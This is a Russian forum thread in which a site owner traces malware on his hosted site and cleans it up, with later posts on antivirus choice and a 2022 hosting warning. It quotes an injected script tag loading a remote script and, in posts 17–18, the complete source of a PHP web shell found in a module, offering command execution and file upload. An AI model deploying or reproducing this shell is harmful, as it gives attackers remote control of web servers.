Вирус на сайте
1. GodZiLLa (13.12.2017 / 13:45)Думаю, что этот раздел как раз в тему.
Вобщем проблема такая, откуда то на сайте нарисовался вирус,
его блокирует расширение адгуард, а если его отключить, то реагирует антивирус,
что заблокирован переход по вредоносной ссылке и адрес cloudcdn.gdn и длинный адрес.
Так думаю, что идёт подгрузка какой то ерунды, типа скрипта для майнинга, или чего то подобного.
Сразу скажу, что никакой рекламы на сайте нет, и счётчики все от гугла, яши и другие отключал, то есть код со страницы удалял, не помогло, значит дело не в них.
Ещё смотрел исходный код страницы, там ничего подобного тоже нет.
Где эта байда может засесть ?
Неужели хостер балует встраиванием вредоноски в сайты ? Хотя хост платный.
Кто то сталкивался с подобным, или есть какие соображения ?
2. Thor (13.12.2017 / 15:33)
®_GodZiIIa_€,
Неужели хостер балует встраиванием вредоноски в сайты ?Иногда такое имеет место быть даже на платных хостингах. Я бы хостинг сменил. Хотя интересно узнать что за хостинг.
3. GodZiLLa (13.12.2017 / 15:46)
Хостинг beget, но раньше такого небыло, буквально только вчера заметил.
У меня там три сайта, из них два на платном, и на одном из них только такая проблема,
на двух других нет ничего подобного, но и посещалка у них не такая, как у заражённого.
4. Вантуз-мен (13.12.2017 / 16:36)
®_GodZiIIa_€, да бывает и на хостингах, а возможно и через тебя, к примеру если у тебя стоит filezilla то при заражении компа, некоторые вирусы умеют по фтп менять содержимое файлов
5. Кевин Митник (13.12.2017 / 17:23)
кстати, если в цепочке есть еще CDN - нужно почистить кеш и еще раз проверить
6. GodZiLLa (13.12.2017 / 17:28)
Vantuz, файлзиллой точно не пользуюсь, так что скорее всего не из-за этого,
на компе - навряд ли, никак не должно быть, антивирус вроде нормальный, каспер, реагирует только на загрузку именно моей страницы.
А вот насчёт хостера, возможно. Если других вариантов нет, придётся писать хостеру.
7. Роман (13.12.2017 / 19:27)
Бегет вроде норм хостинг сомневаюсь что они будут заниматься такой ерундой.. Какой смысл терять репутацию? Что за сайт? Какой двиг? Может это из-за плагина какого-то.
8. dimon (13.12.2017 / 23:27)
Незнаю, правильно ли я делаю, что осмеливаюсь вмешиваться в разговор боле менее авторитетных программистов этого сайта?!
Но все же раз уж влез, то подкину своих мыслят по данной теме.
Короче, исходя из мнения окружающих, меня насторожил один факт. Автор обмолвился, что на хосте у него несколько ресурсов, но проблема только с одним сайтом. А значит, такое больше смахивает, на то, что тот зараженный сайт, кто то методично и аккуратно пытается вскрыть(взломать то бишь). Через какой нибудь плагин с запрятанным туда шеллом.
Так стоп, это чисто мыслишки вслух, и сам я в этой байде не разбираюсь, поэтому в праве могу ошибаться. Так что строго не судите, а примите к сведению, ибо и такое имеет место быть, в наше страшное время высоких технологий, а коварству злодеев нет предела.
9. GodZiLLa (13.12.2017 / 23:28)
Не думаю, что в двиге дело, да и модули не на поверхности и до недавнего не вызывали проблем.
Проблема идёт с главной и далее по страницам, сам проверь, но без хорошего антивируса не рекомендовал бы пока, или по крайней мере без блокировщика рекламы Сайт
Добавлено через 02:25 сек.
Marker, да, сайт несколько раз пытались взломать,
посылали письма с фишинговыми ссылками, но ничего не вышло.
Здесь явно встраивание кода, но где он прячется, никак не пойму.
10. dimon (13.12.2017 / 23:44)
Пробуй просканировать сайт, специальной прогой какой то, забыл как называется, или даже не прога, а какой то сервис чтоли. Там короче, покажет, либо тот самый шелл, либо куда утекает инфа с твоего сайта, которая завуалирована под переброс или как там такое называется. Вобщем, думаю или сам нароешь инфу в инете за этот сервис, либо другие программисты более конкретно обрисуют то, что я тут накатал. Просто пишу, своими словами за те вещи в которых практически не разбираюсь.
11. GodZiLLa (13.12.2017 / 23:55)
Нет такой проги и такого сервиса, который может так тщательно просканировать твой сайт.
Что то около этого есть, но универсального средства нет, только мозгами и ручками можно и надёжно.
Просто пока не могу сообразить, где ещё может быть засада. Разве что только хостера тревожить.
12. dimon (14.12.2017 / 00:13)
®_GodZiIIa_€,
Вот держи ссыль за инфу по твоей теме.
Тут как раз хоть будешь уже иметь представление что и где именно искать при атаке. За одно расписанно и за ручной поиск проблемы, как ты говоришь без применения прог и сервисов по сканированию.
https://defcon.ru/web-security/326/
13. Nervous (14.12.2017 / 04:48)
®_GodZiIIa_€, Вот твое чудо
<script type="text/javascript" src="https://cloudcdn.gdn/js/?trl=0.30">
Вот твой js файл в котором прописан код
http://basaru.net.ru/engine/classes/js/jquery.js
Посмотри когда был изменен этот файл (число и время), значит тогда всунули в него код. Потом идешь к логам и смотришь логи, как попали в этот файл.
14. Thor (14.12.2017 / 08:47)
®_GodZiIIa_€,
Хостинг begetхост говно если честно, хостер думаю тоже
15. Олегъ (14.12.2017 / 10:42)
Если есть какой скрытый код на странице, то его всегда обязательно видно в исходном коде, посмотри сам в браузере исходный код страницы, там всё видно что встроено всегда.
Добавлено через 02:18 сек.
И бегет нормальный хостинг, пользуюсь тарифом фри почти три года и имею несколько разный аккаунтов и сайтов на разных ай пи и ни разу никогда не было у меня к ним никаких замечаний, всегда все сайты быстрые и доступные.
16. GodZiLLa (14.12.2017 / 13:24)
Отрешенный NERVOUS., спасибо, именно то !
Как это файл оказался заражённым, не понятно, дата изменения более года назад, а проявилось всё только сейчас.
Заменил файл нормальным, теперь всё без лишнего кода.
Придётся теперь отслеживать изменения, возможно где то бэкдор,
а может ещё раньше сам занёс вирусный файл, буду разбираться.
Всем огромная благодарность за подсказки, все они были важны.
А бегет да, нормальный хост, уже год на нём, всё нормально.
Кстати писал в поддержку, ответили и нашли проблемы, и тот же файл, что и Отрешенный NERVOUS указал, за что ему двойная благодарность !
17. GodZiLLa (14.12.2017 / 14:16)
Вопрос к знатокам :
В этом коде есть шелл, или иные средства для взлома ?
< php <font face="monospace,terminal" size="-1"><pre><?php ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result);
$result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); }
elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); }
elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = 'Shit. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions");
if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); }
if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); }
if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br></pre>
18. GodZiLLa (14.12.2017 / 14:17)
Продолжение кода
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit"></form><br><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit"></form><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit"></form><script>document.getElementById("bash").focus();</script></font><?php $text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean();
echo $text; ?>
19. Андрей (14.12.2017 / 20:55)
®_GodZiIIa_€, чот код в куче отформатируй его
20. GodZiLLa (14.12.2017 / 22:29)
Сайт не вмещает в пост отформатированный, ограничение.
21. Андрей (14.12.2017 / 23:09)
®_GodZiIIa_€, в этой каше непонятно ничего часть текста обрезает
22. GodZiLLa (14.12.2017 / 23:22)
Andrei4ik93, это претензии к Сане, почему тут код так вырезает ))
Пусть поправит.
23. Сергей (15.12.2017 / 00:29)
®_GodZiIIa_€, название функции говорит за себя
function myshellexecНо это не точно
24. dimon (15.12.2017 / 10:48)
Да тоже самое и мне пришло на ум, но не был уверен в этом.
®_GodZiIIa_€, название функции говорит за себя function myshellexec
Но это не точно
Ждал пока кто нибудь не обратит внимание на эту деталь.
Короче сейчас закину статейку для автора, вернее ссылку по этой теме. Я так понимаю, вся байда происходит у него на сайте, через какую то залитую картинку. Хоть в кодах ничего не смыслю, и не умею их читать, но суть примерно такова, что шелл или типа псевдо шелл, засел там или удаленно как то, влияет на работу сайта через файл картинка.
Ладно это чисто мои предположения, лучше глянуть вот это, там яснее и на примерах расписанно:
https://forum.antichat.ru/threads/easy-shell.191917/
Добавлено через 05:43 сек.
®_GodZiIIa_€,
Совет держи!
Пробуй вбить в поисковик гугл или яндекс, небольшой подозрительный кусок кода. Возможно наткнешся в инете на нужную статейку с подобной проблемой и пути ее решения. Пусть даже не само решение, так зацепку по решению, точно найдешь.
25. GodZiLLa (15.12.2017 / 11:17)
Я уже разобрал и этот код, и его свойства, а вам уже как пример.
При переходе на этот файл, становятся доступными загрузка файлов и выполнение команд.
Он был в одном из модулей.
26. Dmitry Kokorin (15.12.2017 / 23:34)
Сам на бегете сижу уже доххх лет, и проблем именно от хостера ни разу не замечал (по крайней мере с данной ситуацией) да и как выше сказали хостер довольно авторитетный и терять репутацию на такой хрени это полнейший бред
Добавлено через 01:48 сек.
®_GodZiIIa_€, а тебе на будущее - в бегете есть айболит, норм сервис, сам не пользовался но отзывов о нем больше положительных (много бегаю по форумам и тп, часто нем инфа мелькает)
Добавлено через 02:54 сек.
®_GodZiIIa_€, и еще совет, слей каспера в унитаз, у меня нод смарт и проблем не знаю и оперативу не убивает как каспер
27. GodZiLLa (15.12.2017 / 23:49)
Я там год и тоже доволен, у них всё нормально.
Сам на бегете сижу уже доххх лет, и проблем именно от хостера ни разу не замечал (по крайней мере с данной ситуацией) да и как выше сказали хостер довольно авторитетный и терять репутацию на такой хрени это полнейший бред
Да теперь знаю про этот сканер, вчера показали.
®_GodZiIIa_€, а тебе на будущее - в бегете есть айболит, норм сервис, сам не пользовался но отзывов о нем больше положительных (много бегаю по форумам и тп, часто нем инфа мелькает)
Тебе совет, слей нод ещё глубже, проблем не знаешь, потому что вирусы живут и не тревожат,
®_GodZiIIa_€, и еще совет, слей каспера в унитаз, у меня нод смарт и проблем не знаю и оперативу не убивает как каспер
пока этот нод изображает деятельность ))
Не для холливара и спорить даже не буду, но я проверял антивирусы на очень хорошем реальном вирусе и этот "нод", в такой среде, сам себя принял за вирус и сам себя уничтожил
После этого я его даже за антивирус не считаю ))
Не в обиду, но просто реально почти всех проверял, один каспер на ура справился.
Так что лучше давай без советов ))
28. dimon (15.12.2017 / 23:58)
Анти малвар еще есть, вроде неплохой продукт, но не уверен.
29. Dmitry Kokorin (16.12.2017 / 22:27)
®_GodZiIIa_€, вот как раз каспер меня и подводил сколько раз..
30. GodZiLLa (17.12.2017 / 06:03)
Да я всё понимаю, просто холивар на тему антивирусов разводить здесь не будем,
это дело не благодарное, да и уже столько раз пережёванное ))
31. Dmitry Kokorin (17.12.2017 / 17:22)
я не развожу) лишь высказал свое ЛИЧНОЕ мнение
а решать уже тебе самому чем пользоваться
32. GodZiLLa (17.12.2017 / 17:35)
Да я и не имел ввиду что ты разводишь,
просто хотел упредить ситуацию, когда такое очень возможно ))
33. Волан-де-Морт (17.12.2017 / 20:25)
У меня через FileZilla заразился сайт, закачивал бэкап и все равно опять двадцать пять. Переустановил комп(кстати, Каспер лицензионный стоит, не нашел ни фига)
Добавлено через 01:07 сек.
а ша чем пользуешься ?
®_GodZiIIa_€, вот как раз каспер меня и подводил сколько раз..
34. GodZiLLa (19.12.2017 / 12:09)
Да любой антивирус не является сто процентной защитой.
От кривых ручек, или от не внимательности можно больше напортачить, и никакой антивирус не поможет ))
35. Dmitry Kokorin (19.12.2017 / 22:02)
поменьше сторонних плагинов, побольше своего (нормального надежного) кода и сайт будет в безопасности
36. FUNZIGER (21.12.2017 / 22:51)
Я как то домен зарегал, а он в чёрном списке у антивирусов, ох и намучался я с ним, но вывел его в свет.
37. Dmitry Kokorin (22.12.2017 / 03:04)
FUNZIGER, не проще новый зарегать чем гемор собирать?
38. GodZiLLa (23.12.2017 / 21:04)
DimmoS, наверное домен был очень красивым, если столько усилий для его реанимации ))
39. Dmitry Kokorin (24.12.2017 / 01:12)
®_GodZiIIa_€, я б забил) даже если красивый, время на него тратить, ну его...
40. GodZiLLa (24.12.2017 / 06:06)
DimmoS, я бы тоже, придумал бы другой, но у фанзигера видать были мотивы )
41. Dmitry Kokorin (24.12.2017 / 16:56)
®_GodZiIIa_€,
42. Quadratik (15.01.2018 / 03:23)
Нашел, кто баловался? Сейчас и в магазине хромобраузера всякие бяки присутствуют, то майнят, то подменяют платежки)
43. Dmitry Kokorin (15.01.2018 / 14:25)
Quadratik, да, майнеров дохх сейчас, особенно маскируют в адблоках всяких, коих в магазине хрома дохх
44. Quadratik (15.01.2018 / 16:52)
DimmoS, никогда этим адблокам не доверял, кейгенам и всяким кряко-ломателям прог и прочего хлама, в которых пишут - блаблабла, отключите антивирь, блабла, типа ругаться будет на святую прогу)) ну в ней под шумок замаскирован минимум ботнетик.
45. GodZiLLa (15.01.2018 / 18:12)
Источник нет, не нашёл откуда.
Нашел, кто баловался? Сейчас и в магазине хромобраузера всякие бяки присутствуют, то майнят, то подменяют платежки)
Но после зачистки пока всё работает и проблема пока не возникала.
Хотя думаю, что подгрузили вирус через один скрипт из дополнительного модуля,
удалил этот скрипт и пока тишина.
От расширений, да может быть, но для блокировки рекламы пользую adguard, а он доказал свою эффективность и чистоту.
46. Dmitry Kokorin (15.01.2018 / 22:14)
Quadratik,
®_GodZiIIa_€, я этот использую, уже больше года, результатом доволен, оперативу не жрет, библа норм
47. Удаленный (05.01.2022 / 07:47)
Что значит вирус на сайте Doubt.PHP.ImgInclude? Это предупреждение пришло с хостинга, а вот код самой страницы:
<?php
header('Content-type:text/html; charset=utf-8');
echo'<!DOCTYPE html>';
echo'<html lang="ru"><head>';
echo'<title>%TITLE%</title>';
echo'<meta charset="utf-8">';
echo'<style>';
include('style.css');
echo'</style>';
echo'<meta name="viewport" content="width=device-width, initial-scale=1">';
echo'<link rel="icon" type="image/png" href="/favicon.png">';
echo '<meta name="description" content="wap motor 27 mini mod">';
echo'<meta name="generator" content="wap-motor 27">';
echo'</head><body>';
echo'<header><div class="a" id="up">
<a href="/index.php"><img src="'.BASEDIR.'themes/zima/logo.png" alt="wap"></a><br>';
if ($_SERVER['PHP_SELF']=='/index.php'){ }
else {
echo'<a style="border:1px solid #000080; padding:0px 5px;" href="/index.php?p=keliya">Келия</a>';
}
echo'</div></header>';
echo'<main><div>';
include_once (BASEDIR."includes/isset.php");
?>
48. Вантуз-мен (05.01.2022 / 15:32)
@Olegofrend, вроде нет ничего
<a href="/index.php"><img src="'.BASEDIR.'themes/zima/logo.png" alt="wap"></a><br>';
Я в моторе давно убрал из путей BASEDIR года 2-3 назад, видимо автор мода использовал старую версию
попробуй просто прописать <img src="/themes/zima/logo.png" alt="wap"> вот так, без BASEDIR
49. Удаленный (05.01.2022 / 15:57)
Вантуз-мен, хорошо, можно вообще убрать из кода BASEDIR и оставить все пути без него?
Тогда раньше тогда для чего нужна была эта переменная?
50. Вантуз-мен (05.01.2022 / 16:11)
@Olegofrend, уже не помню, вроде чтобы была возможность ставить движок в директорию, я посмотрел в архиве, там почти все пути к картинкам были без BASEDIR
По хорошему надо избавиться от них
51. Удаленный (05.01.2022 / 16:31)
Вантуз-мен, хорошо, избавлюсь от них и посмотрим.
52. Владимир (20.01.2023 / 21:43)
удалил
URL: https://visavi.net/topics/43827